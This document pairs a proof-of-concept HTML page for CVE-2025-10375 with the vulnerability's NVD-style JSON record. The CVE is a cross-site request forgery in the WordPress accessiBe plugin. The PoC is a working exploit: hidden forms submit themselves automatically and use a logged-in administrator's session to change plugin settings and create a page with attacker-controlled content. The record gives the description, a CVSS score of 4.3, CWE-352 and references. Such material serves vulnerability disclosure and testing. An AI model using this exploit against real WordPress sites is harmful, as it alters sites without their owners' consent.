CVE-2025-10375

<!-- CVE-2025-10375 CSRF PoC for WordPress accessiBe plugin --> <!-- This PoC demonstrates how an attacker can exploit missing nonce validation --> <!-- on AJAX actions like accessibe_modify_config and accessibe_add_verification_page --> <html> <head><title>CSRF PoC - CVE-2025-10375</title></head> <body> <h1>Loading... Please wait</h1> <!-- Auto-submitting form to modify plugin configuration --> <form id="csrf_modify_config" action="http://target-wordpress-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="accessibe_modify_config" /> <input type="hidden" name="config_data" value='{"setting":"malicious_value"}' /> </form> <!-- Auto-submitting form to create verification page --> <form id="csrf_add_verification" action="http://target-wordpress-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="accessibe_add_verification_page" /> <input type="hidden" name="page_content" value="Attacker controlled content" /> </form> <script> // Auto-submit forms when victim visits this page // The browser will include the admin's session cookies automatically document.getElementById('csrf_modify_config').submit(); // After first form submits, submit the second one setTimeout(function() { document.getElementById('csrf_add_verification').submit(); }, 1000); </script> </body> </html>

{"cve": {"id": "CVE-2025-10375", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:42.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Web Accessibility By accessiBe plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10. This is due to missing nonce validation on multiple AJAX actions including accessibe_signup, accessibe_login, accessibe_license_trial, accessibe_modify_config, and accessibe_add_verification_page. This makes it possible for unauthenticated attackers to modify plugin settings and create verification files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/accessibe/tags/2.7/class.accessibeforwp.php#L273", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3376235%40accessibe&new=3376235%40accessibe&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3aac40c-1576-45b5-90f8-14ff05c089c7?source=cve", "source": "[email protected]"}]}}